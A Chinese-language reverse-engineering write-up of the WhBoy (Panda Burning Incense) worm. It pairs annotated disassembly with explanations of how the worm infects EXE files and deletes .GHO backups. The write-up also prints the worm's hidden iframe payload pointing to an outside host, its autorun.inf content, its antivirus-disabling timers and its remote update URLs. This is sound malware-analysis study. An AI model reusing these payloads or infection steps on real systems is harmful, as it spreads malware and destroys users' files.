seg000:0040941B lea edx, [ebp+var_180]
seg000:00409421 mov eax, [ebp+var_158]
seg000:00409427 call StringToUpper
seg000:0040942C mov edx, [ebp+var_180] ; 大寫的文件夾名稱
seg000:00409432 pop eax ; 恢復保存的字符串
seg000:00409433 call StringCmp ; 比較獲取到的文件夾名稱是否是WINDOWS
seg000:00409438 jz loc_40A105 ; 是的話跳轉進行其他操作
seg000:0040943E lea edx, [ebp+var_184]
seg000:00409444 mov eax, offset aWinnt_0 ; "WINNT"
seg000:00409449 call StringToUpper
seg000:0040944E mov eax, [ebp+var_184] ; 大寫的"WINNT"
seg000:00409454 push eax
seg000:00409455 lea edx, [ebp+var_188]
seg000:0040945B mov eax, [ebp+var_158]
seg000:00409461 call StringToUpper
seg000:00409466 mov edx, [ebp+var_188] ; 大寫的文件夾名稱
seg000:0040946C pop eax
seg000:0040946D call StringCmp ; 比較獲取到的文件夾名稱是否是WINNT
seg000:00409472 jz loc_40A105 ; 是的話跳轉
;後面的操作和前面一樣,都是判斷是否是病毒中指定的某些特殊文件夾名稱,如果是就跳轉做其他操作,不是的話繼續執行進行判斷,直到所有的內置名稱判斷完畢
;判斷了如下的文件夾:"WINDOWS" "WINNT" "system32" "Document And Setting" "System Volume Information" "Recycled" "Windows NT" "WindowsUpdate" "Windows Media Player" "Outlook Express" "Internet Explorer" "NetMeeting" "Common Files" "ComPlus Applications" "Common Files" "Messenger" "InstallShield Installation Information" "MSN" "Microsoft Frontpage" "Movie Maker" "MSN Gamin Zone"
- 如果都不是以上的代碼的話,那麼就會順序執行到地址004098C6處的代碼,代碼分析如下:
seg000:004098C6 push [ebp+strDriverPath]
seg000:004098C9 push [ebp+var_158]
seg000:004098CF push offset aDesktop__ini_1 ; "\\Desktop_.ini"
seg000:004098D4 lea eax, [ebp+var_224]
seg000:004098DA mov edx, 3
seg000:004098DF call StringCatN ; 進行拼接,將"\\Desktop_.ini"拼接到當前到目錄
seg000:004098E4 mov eax, [ebp+var_224] ; 拼接後的完整路徑
seg000:004098EA call FileExists ; 檢查路徑下是否存在Desktop_.ini文件
seg000:004098EF test al, al
seg000:004098F1 jz loc_409ACE ; 不存在進行跳轉
seg000:004098F7 push [ebp+strDriverPath] ; 磁盤路徑
seg000:004098FA push [ebp+var_158] ; 文件夾名稱
seg000:00409900 push offset aDesktop__ini_1 ; "\\Desktop_.ini"
seg000:00409905 lea eax, [ebp+var_228] ; 存儲拼接後的完整路徑
seg000:0040990B mov edx, 3 ; 進行拼接的字符串個數
seg000:00409910 call StringCatN ; 拼接
seg000:00409915 mov eax, [ebp+var_228]
seg000:0040991B lea edx, [ebp+var_8] ; 存儲文件讀取到內存後的首地址指針
seg000:0040991E call ReadFilToMem ; 讀取Desktop_.ini文件到內存中
seg000:0040991E ; 也就是獲取到了ini文件中存的時間記錄
seg000:00409923 lea eax, [ebp+SystemTime] ; 保存當前系統時間
seg000:00409929 push eax ; lpSystemTime
seg000:0040992A call j_GetLocalTime ; 獲取當前系統時間
seg000:0040992F lea edx, [ebp+var_22C] ; 保存格式化時間信息字符串首地址
seg000:00409935 movzx eax, [ebp+SystemTime.wYear] ; 年
seg000:00409935 ; 使用函數將獲取到的年份信息格式化到字符串中
seg000:0040993C call StrTimeFormat
seg000:00409941 push [ebp+var_22C]
seg000:00409947 push offset dword_40A3D0 ; 字符"-"用於分隔
seg000:0040994C lea edx, [ebp+var_230]
seg000:00409952 movzx eax, [ebp+SystemTime.wMonth] ; 月
seg000:00409959 call StrTimeFormat
seg000:0040995E push [ebp+var_230]
seg000:00409964 push offset dword_40A3D0 ; 字符"-"用於分隔
seg000:00409969 lea edx, [ebp+var_234]
seg000:0040996F movzx eax, [ebp+SystemTime.wDay] ; 日
seg000:00409976 call StrTimeFormat
seg000:0040997B push [ebp+var_234]
seg000:00409981 lea eax, [ebp+var_C] ; 存儲拼接後的格式化時間字符串
seg000:00409984 mov edx, 5
seg000:00409989 call StringCatN ; 將轉化後的字符串進行拼接
seg000:00409989 ; 拼接後成爲如下格式:2019-11-27
seg000:0040998E mov eax, [ebp+var_8] ; 文件中的時間
seg000:00409991 mov edx, [ebp+var_C] ; 當前系統時間
seg000:00409994 call StringCmp ; 比較文件中的時間和當前系統時間
seg000:00409999 jnz short loc_4099BF ; 不等跳轉
seg000:0040999B lea eax, [ebp+var_238] ; 存儲拼接後的完整文件夾路徑
seg000:004099A1 mov ecx, [ebp+var_158] ; 文件夾名稱
seg000:004099A7 mov edx, [ebp+strDriverPath] ; 磁盤路徑
seg000:004099AA call DriverPathCat ; 拼接
seg000:004099AF mov eax, [ebp+var_238]
seg000:004099B5 call sub_4087E8 ; 繼續查找目錄,寫入ini以及更新ini文件的感染時間
seg000:004099BA jmp loc_40A105
- 上述一段代碼執行了病毒感染前的檢查工作,會檢查目錄中的“Desktop_.ini”文件,並更新感染時間。當一個文件遍歷結束後,會從標號loc_40A105處的代碼跳轉回loc_4093E3處重新開始執行上述步驟。這裏並沒有執行文件感染操作,具體的感染操作是在地址004093EF處的代碼跳轉到的標號loc_409BFC處。
seg000:00409BFC loc_409BFC: ; CODE XREF: FindFileAndInfect+A7j
seg000:00409BFC ; FindFileAndInfect+B6j
seg000:00409BFC mov eax, [ebp+var_158] ; 文件名
seg000:00409C02 cmp byte ptr [eax], 2Eh ; 字符"."
seg000:00409C05 jz loc_40A0FE ; 跳過特殊的系統文件
seg000:00409C0B lea edx, [ebp+var_274] ; 存儲獲取到的後綴名
seg000:00409C11 mov eax, [ebp+var_158]
seg000:00409C17 call GetFileSuffix ; 獲取文件後綴名
seg000:00409C1C mov eax, [ebp+var_274]
seg000:00409C22 lea edx, [ebp+var_270] ; 存儲大寫的後綴名
seg000:00409C28 call UpperSuffixStr ; 轉換後綴名爲大寫
seg000:00409C2D mov eax, [ebp+var_270]
seg000:00409C33 mov edx, offset dword_40A3DC ; "GHO"
seg000:00409C33 ; 系統鏡像文件後綴名
seg000:00409C38 call StringCmp ; 比較後綴名
seg000:00409C3D jnz short loc_409C64 ; 不是GHO的話跳轉
seg000:00409C3F lea eax, [ebp+var_278]
seg000:00409C45 mov ecx, [ebp+var_158]
seg000:00409C4B mov edx, [ebp+strDriverPath]
seg000:00409C4E call DriverPathCat
seg000:00409C53 mov eax, [ebp+var_278]
seg000:00409C59 call CheckPath ; 檢查路徑
seg000:00409C5E push eax ; lpFileName
seg000:00409C5F call j_DeleteFileA ; 刪除系統鏡像文件
- 上述代碼完成了文件後綴名檢查功能,如果檢查到後綴名爲“GHO”也就是文件爲系統鏡像文件,那麼就刪除,否則跳轉到標記loc_409C64處進行後續操作。
;省略部分代碼,省略的代碼用於判斷文件是否是setup.exe或NTDETECT.COM
; 上述兩個文件都不是的話,進行下面的操作
seg000:00409D02 lea edx, [ebp+var_294]
seg000:00409D08 mov eax, [ebp+var_158] ; 文件路徑
seg000:00409D0E call GetFileSuffix ; 得到後綴
seg000:00409D13 mov eax, [ebp+var_294]
seg000:00409D19 lea edx, [ebp+var_290]
seg000:00409D1F call StringToUpper ; 轉化爲大寫
seg000:00409D24 mov eax, [ebp+var_290] ; 大寫的後綴
seg000:00409D2A push eax
seg000:00409D2B lea edx, [ebp+var_298]
seg000:00409D31 mov eax, offset dword_40A414 ; "EXE"
seg000:00409D36 call StringToUpper
seg000:00409D3B mov edx, [ebp+var_298] ; 大寫的"EXE"
seg000:00409D41 pop eax
seg000:00409D42 call StringCmp
seg000:00409D47 jnz short loc_409D68 ; 檢查文件後綴是否爲exe
seg000:00409D47 ; 是的話執行感染操作,不是的話跳轉
seg000:00409D49 lea eax, [ebp+var_29C]
seg000:00409D4F mov ecx, [ebp+var_158]
seg000:00409D55 mov edx, [ebp+strDriverPath]
seg000:00409D58 call DriverPathCat ; 拼接出完整的exe文件路徑
seg000:00409D5D mov eax, [ebp+var_29C];傳入參數爲完整文件路徑
seg000:00409D63 call InfectFile ; 病毒感染函數
- 上述代碼得到後綴是exe的文件,然後調用函數進行病毒感染,重命名函數InfectFile內部分析如下:
seg000:00407F62 mov eax, [ebp+var_4] ; 文件的完整路徑
seg000:00407F65 call GetFileName ; 獲取到完整的文件路徑
seg000:00407F6A mov eax, [ebp+var_1E0]
seg000:00407F70 call OpenFileAndCheckRun ; 打開文件判斷是否運行
seg000:00407F75 test al, al
seg000:00407F77 jz short loc_407F86 ; 文件未運行跳轉
seg000:00407F79 xor eax, eax
seg000:00407F7B pop edx
seg000:00407F7C pop ecx
seg000:00407F7D pop ecx
seg000:00407F7E mov fs:[eax], edx
seg000:00407F81 jmp INJECT_FILE_END ; 文件正在運行結束感染
seg000:00407F81 ; 重命名loc_0040811A爲INJECT_FILE_END
seg000:00407F86 loc_407F86: ; CODE XREF: InfectFile+77j
seg000:00407F86 call @System@Randomize$qqrv ; System::Randomize(void)
seg000:00407F8B lea edx, [ebp+var_1E4]
seg000:00407F91 xor eax, eax
seg000:00407F93 call GetPathName ; 得到病毒文件所在的路徑
seg000:00407F98 mov edx, [ebp+var_1E4]
seg000:00407F9E mov eax, [ebp+var_4]
seg000:00407FA1 call StringCmp ; 判斷病毒文件和要感染文件是否在同一路徑下
seg000:00407FA1 ; 在同一路徑下放棄感染
seg000:00407FA6 jnz short loc_407FB5 ;
seg000:00407FA6 ; 省略部分代碼,和上面一樣的代碼
seg000:00407FB5 loc_407FB5: ; CODE XREF: InfectFile+A6j
seg000:00407FB5 lea eax, [ebp+var_8] ; 設置感染標記
seg000:00407FB8 call SetAFlag
seg000:00407FBD lea edx, [ebp+var_8] ; 存儲內存首地址指針
seg000:00407FC0 mov eax, [ebp+var_4]
seg000:00407FC3 call ReadFilToMem ; 讀取文件到內存中
seg000:00407FC8 cmp [ebp+var_8], 0 ; 判斷是否讀取成功
seg000:00407FCC jnz short loc_407FDB ; 失敗結束感染
seg000:00407FCC ; 省略部分的一樣的代碼
seg000:00407FDB loc_407FDB: ; CODE XREF: InfectFile+CCj
seg000:00407FDB mov edx, [ebp+var_8] ; 內存首地址
seg000:00407FDE mov eax, offset aWhboy ; "WhBoy"
seg000:00407FE3 call FindSingPos ; 判斷字符串"WhBoy"在文件中的位置
seg000:00407FE3 ; 相當於檢查文件是否有"WhBoy"信息
seg000:00407FE3 ; 如果有就退出感染
seg000:00407FE8 test eax, eax
seg000:00407FEA jle short loc_407FF9 ;
seg000:00407FEA ; 省略部分一樣的代碼
seg000:00407FF9 loc_407FF9: ; CODE XREF: InfectFile+EAj
seg000:00407FF9 push 80h ; dwFileAttributes
seg000:00407FFE mov eax, [ebp+var_4]
seg000:00408001 call CheckPath
seg000:00408006 mov ebx, eax
seg000:00408008 push ebx ; lpFileName
seg000:00408009 call j_SetFileAttributesA ; 修改屬性
seg000:0040800E push 1 ; dwMilliseconds
seg000:00408010 call j_Sleep ; 設置睡眠時間
seg000:00408015 push 0 ; apt
seg000:00408017 push ebx ; hdc
seg000:00408018 lea edx, [ebp+var_1E8]
seg000:0040801E xor eax, eax
seg000:00408020 call GetPathName ; 得到文件路徑
seg000:00408025 mov eax, [ebp+var_1E8]
seg000:0040802B call CheckPath ; 檢查路徑
seg000:00408030 push eax ; lpExistingFileName
seg000:00408031 call j_CopyFileA ; 複製當前運行的病毒文件,並覆蓋將要被感染的文件
seg000:00408036 test eax, eax
seg000:00408038 jnz short loc_408047 ; 判斷是否覆蓋成功
seg000:00408038 ; 失敗則結束,省略部分代碼
seg000:00408047 loc_408047: ; CODE XREF: InfectFile+138j
seg000:00408047 push offset dword_40816C ; "WhBoy"
seg000:0040804C lea edx, [ebp+var_1EC]
seg000:00408052 mov eax, [ebp+var_4]
seg000:00408055 call GetFileName ; 從文件路徑中得到文件名
seg000:0040805A push [ebp+var_1EC]
seg000:00408060 push offset a_exe_0 ; ".exe"
seg000:00408065 push offset dword_40818C ; 0x2
seg000:0040806A mov eax, [ebp+var_8] ; 感染標記
seg000:0040806D call GetFileLen ; 得到感染標記長度
seg000:00408072 lea edx, [ebp+var_1F0]
seg000:00408078 call StrTimeFormat ; 格式化的時間
seg000:0040807D push [ebp+var_1F0]
seg000:00408083 push offset dword_408198 ; 0x1
seg000:00408088 lea eax, [ebp+var_10]
seg000:0040808B mov edx, 6
seg000:00408090 call StringCatN ; 將上述全部拼接起來,組合成一個完整的感染標記
seg000:00408090 ; 類似於前面分析過的
seg000:00408095 lea eax, [ebp+var_C]
seg000:00408098 mov edx, [ebp+var_8]
seg000:0040809B call @System@@LStrLAsg$qqrpvpxv ; System::__linkproc__ LStrLAsg(void *,void *)
seg000:004080A0 mov edx, [ebp+var_4]
seg000:004080A3 lea eax, [ebp+var_1DC]
seg000:004080A9 call CreateNewFile ; 創建文件
seg000:004080AE mov eax, off_40E2BC
seg000:004080B3 mov byte ptr [eax], 2
seg000:004080B6 lea eax, [ebp+var_1DC]
seg000:004080BC call Append ; 以附加的方式打開文件
seg000:004080C1 call _IOTest
seg000:004080C6 mov edx, [ebp+var_C]
seg000:004080C9 lea eax, [ebp+var_1DC]
seg000:004080CF call WriteFileInfo ; 以附加的方式寫入要被感染文件的原內容
seg000:004080D4 call Flush
seg000:004080D9 call _IOTest
seg000:004080DE mov edx, [ebp+var_10]
seg000:004080E1 lea eax, [ebp+var_1DC]
seg000:004080E7 call WriteFileInfo ; 以附加的方式寫入標記信息
seg000:004080EC call Flush
seg000:004080F1 call _IOTest
seg000:004080F6 lea eax, [ebp+var_1DC]
seg000:004080FC call CloseFile ; 關閉文件
;部分代碼略
seg000:0040810E jmp short INJECT_FILE_END ; 感染結束
;上述部分代碼和之前分析的一樣,就不再詳細分析
- 感染函數就如上述:先將目標文件讀取到內存,並獲取文件名和大小,然後將病毒文件複製到目標文件之前,應追加目標程序的文件,最後再加入標記,這樣就完成了病毒的感染過程。
- 以上只是exe、src、pif、com等文件使用的感染函數,其它還有php、asp、htm等Web類型的文件使用了另一個函數進行感染,操作是將一串html代碼字符串
"<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>"
寫入符合要求的文件末尾,具體分析如下:
seg000:004079F1 lea edx, [ebp+var_C] ; 存儲內存首地址指針
seg000:004079F4 mov eax, [ebp+var_4] ; 文件路徑
seg000:004079F7 call ReadFilToMem ; 讀取文件到內存中
seg000:004079FC lea ecx, [ebp+var_8]
seg000:004079FF mov edx, offset aSearch ; "Search"
seg000:00407A04 mov eax, offset aNbEndWGIspy_ps ; "=nb{end'w{g>ispy>,.ps~*bb?2'gm.12&mmeb|"...
seg000:00407A09 call GetHtmlStr ; 函數用來使用傳入的字符串就算出一段html代碼
seg000:00407A09 ; 這裏構建出的代碼字符串爲:
seg000:00407A09 ; "<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>"
seg000:00407A0E mov edx, [ebp+var_C]
seg000:00407A11 mov eax, [ebp+var_8]
seg000:00407A14 call FindSingPos ; 判斷是否是已經修改過的文件
seg000:00407A19 test eax, eax
seg000:00407A1B jnz loc_407AC3 ; 修改過進行跳轉,結束感染
seg000:00407A21 xor eax, eax
seg000:00407A23 push ebp
seg000:00407A24 push offset loc_407AB9
seg000:00407A29 push dword ptr fs:[eax]
seg000:00407A2C mov fs:[eax], esp
seg000:00407A2F mov eax, [ebp+var_4]
seg000:00407A32 call FileExists ; 關閉文件
seg000:00407A37 test al, al
seg000:00407A39 jz short loc_407A5A ; 關閉失敗跳轉退出感染
seg000:00407A3B mov edx, 1
seg000:00407A40 mov eax, [ebp+var_4]
seg000:00407A43 call FileOpen ; 打開文件
seg000:00407A48 mov ebx, eax
seg000:00407A4A mov ecx, 2 ; dwMoveMethod
seg000:00407A4F xor edx, edx ; lDistanceToMove
seg000:00407A51 mov eax, ebx
seg000:00407A53 call sub_4056FC ; 設置文件內指針指向末尾
seg000:00407A58 jmp short loc_407A64
seg000:00407A64 loc_407A64: ; CODE XREF: sub_4079CC+8Cj
seg000:00407A64 cmp ebx, 0FFFFFFFFh ; 判斷指針是否設置成功
seg000:00407A67 jnz short loc_407A73
seg000:00407A69 xor eax, eax
seg000:00407A6B pop edx
seg000:00407A6C pop ecx
seg000:00407A6D pop ecx
seg000:00407A6E mov fs:[eax], edx ; 將標記代碼字符串寫入文件尾部
seg000:00407A71 jmp short loc_407AC3 ; 跳轉到結束
2.定時器回調分析
-
分析完畢上述線程回調中的病毒感染過程後,開始對另一個感染過程也就是使用了定時器的過程進行分析。定時器中會執行和上述操作類似的過程,遍歷所有磁盤找到根目錄,然後保存病毒副本setup.exe文件在根目錄下,並在目錄下創建一個autorun.inf文件,具體分析如下:
定時器設置的時間間隔爲6秒
seg000:0040C374 SetTimerAuto proc near ; CODE XREF: InfectOtherFile+5p
seg000:0040C374 push offset TimerFunc ; lpTimerFunc 定時器回調函數
seg000:0040C379 push 1770h ; uElapse 時間設置爲6秒
seg000:0040C37E push 0 ; nIDEvent
seg000:0040C380 push 0 ; hWnd
seg000:0040C382 call j_SetTimer
- 部分關鍵代碼如下:
- 分析後發現autorun.inf中寫入的內容爲下面這段
- 整理後爲這樣一段格式的內容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
3.網絡感染分析
- 函數NetWorkInfect主要邏輯就是循環產生線程,然後在線程回調函數內部進行操作:
seg000:0040BAFB push 0
seg000:0040BAFD push 0
seg000:0040BAFF lea eax, [ebp+var_4]
seg000:0040BB02 push eax
seg000:0040BB03 mov ecx, offset sub_40BA8C;傳入的線程回調函數
seg000:0040BB08 xor edx, edx
seg000:0040BB0A xor eax, eax
seg000:0040BB0C call BeginThread ; 函數內部創建一個新線程並開啓
seg000:0040BB11 dec bx ; 用於計數,循環次數爲10次
seg000:0040BB14 jnz short loc_40BAFB
- 創建的線程回調中有一個主要的函數
seg000:0040BAAC call sub_40B864 ; 關鍵函數,內部進行端口掃描並連接服務
,然後在內部進行了操作:
3.第三個call-保護自身
- 在這個函數內部設置了6個計時器,每個計時器使用不同的回調函數進行不同的操作,其實從各個定時器的時間設置上也可以大致猜測其回調函數幹了什麼事,這裏分析如下:
seg000:0040D096 loc_40D096: ; CODE XREF: ProtectSelf+7j
seg000:0040D096 push offset sub_40CEE4 ; lpTimerFunc
seg000:0040D096 ; 內部關閉了殺毒軟件,設置了啓動項和文件隱藏
seg000:0040D09B push 3E8h ; uElapse 1秒
seg000:0040D0A0 push 0 ; nIDEvent
seg000:0040D0A2 push 0 ; hWnd
seg000:0040D0A4 call j_SetTimer
seg000:0040D0A9 mov dword_40E2B0, eax
seg000:0040D0AE push offset sub_40D040 ; lpTimerFunc
seg000:0040D0AE ; 通過網址http://www.ac86.cn/66/up.txt來更新
seg000:0040D0AE ; 現在網址已沒用,不在分析
seg000:0040D0B3 push 124F80h ; uElapse 20分鐘
seg000:0040D0B8 push 0 ; nIDEvent
seg000:0040D0BA push 0 ; hWnd
seg000:0040D0BC call j_SetTimer
seg000:0040D0C1 mov dword_40E2B4, eax
seg000:0040D0C6 push offset sub_40D048 ; lpTimerFunc
seg000:0040D0C6 ; 內部有多個線程
seg000:0040D0C6 ; 遍歷了磁盤,關閉了共享功能
seg000:0040D0C6 ; 然後殺死了當前的時鐘
seg000:0040D0CB push 2710h ; uElapse 10秒
seg000:0040D0D0 push 0 ; nIDEvent
seg000:0040D0D2 push 0 ; hWnd
seg000:0040D0D4 call j_SetTimer
seg000:0040D0D9 mov uIDEvent, eax
seg000:0040D0DE push offset sub_407430 ; lpTimerFunc
seg000:0040D0DE ; 設置殺毒軟件註冊表啓動項爲失效
seg000:0040D0DE ; 關閉了一些服務
seg000:0040D0E3 push 1770h ; uElapse 6秒
seg000:0040D0E8 push 0 ; nIDEvent
seg000:0040D0EA push 0 ; hWnd
seg000:0040D0EC call j_SetTimer
seg000:0040D0F1 push offset sub_40CC4C ; lpTimerFunc
seg000:0040D0F1 ; 更新病毒,從網址http://update.whboy.net/worm.txt
seg000:0040D0F6 push 2710h ; uElapse 10秒
seg000:0040D0FB push 0 ; nIDEvent
seg000:0040D0FD push 0 ; hWnd
seg000:0040D0FF call j_SetTimer
seg000:0040D104 push offset sub_40C728 ; lpTimerFunc
seg000:0040D104 ; 獲取一些網址的源碼
seg000:0040D109 push 1B7740h ; uElapse 30分鐘
seg000:0040D10E push 0 ; nIDEvent
seg000:0040D110 push 0 ; hWnd
seg000:0040D112 call j_SetTimer
seg000:0040D117 retn
第一個計時器功能概覽:
sub_406E2C內部線程回調函數主要功能-下圖只是遍歷窗口,後面還有對進程的遍歷,這裏就不再贅述了,有興趣的可以自己查看,大致結束瞭如下的一些進程:
第二個計時器功能概覽:
- 更新程序,網址http://www.ac86.cn/66/up.txt已作廢,不進行分析
第三個計時器功能概覽:
第四個計時器功能概覽:
- 設置瞭如下的一些殺毒軟件的啓動項:
- 有兩個函數用於停止服務,停止的服務大致有以下一些:(還挺多的0.0)
第五個計時器概覽:
- 獲取了一些網頁的源碼,這裏網頁地址如果使用OD單步調試會跑飛,可以跳過獲取源碼的函數,通過設置EIP來得到如下要獲取的網址的字符串
第六個計時器概覽:
- 通過 “http://update.whboy.net/worm.txt”這個網址進行更新,網址已不在,也不再分析
致謝
- 感謝15PB教學視頻和老師對我的指導。